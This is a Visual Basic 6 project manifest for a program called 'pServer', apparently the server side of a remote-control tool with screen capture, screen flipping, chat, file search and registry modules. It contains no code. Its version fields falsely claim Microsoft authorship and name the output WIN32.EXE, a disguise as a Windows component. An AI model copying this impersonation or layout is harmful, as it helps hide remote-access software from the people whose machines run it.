Type=Exe
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\WINDOWS\SYSTEM\StdOle2.tlb#OLE Automation
Form=frmServer.frm
Module=mdSubClass; mdSubClass.bas
Class=clsSocket; clsSocket.cls
Module=mdPCInfo; mdPCInfo.bas
Module=WinsockApi; WinSockAPI.bas
Module=Module1; Module1.bas
Module=mdResolution; mdResolution.bas
Module=mdExtra; mdExtra.bas
Module=mdSound; mdSound.bas
Form=frmSCR.frm
Module=mdFlipScreen; mdFlipScreen.bas
Form=frmChat.frm
Module=mdFindFiles; mdFindFiles.bas
Form=frmSCRPreview.frm
Module=mdConnected; mdConnected.bas
Module=mdRegistry; mdRegistry.bas
Module=mIntelJPEGLibrary; mIJL.bas
Class=cDIBSection; cDIBSection.cls
Module=mdMIME; mdMIME.bas
Module=mdCompression; mdCompression.bas
Module=mdFileDate; mdFileDate.bas
ResFile32="Resources.RES"
IconForm="frmServer"
Startup="frmServer"
HelpFile=""
Title="WIN32"
ExeName32="WIN32.EXE"
Path32="C:\My Documents"
Command32=""
Name="pServer"
HelpContextID="0"
CompatibleMode="0"
MajorVer=5
MinorVer=0
RevisionVer=1515
AutoIncrementVer=0
ServerSupportFiles=0
VersionCompanyName="Microsoft Corporation"
VersionFileDescription="Microsoft WIN32"
VersionLegalCopyright="Copyright (C) Microsoft Corp. 1981-1998"
VersionProductName="Microsoft(R) Windows NT(R) Operating System"
CompilationType=0
OptimizationType=0
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1
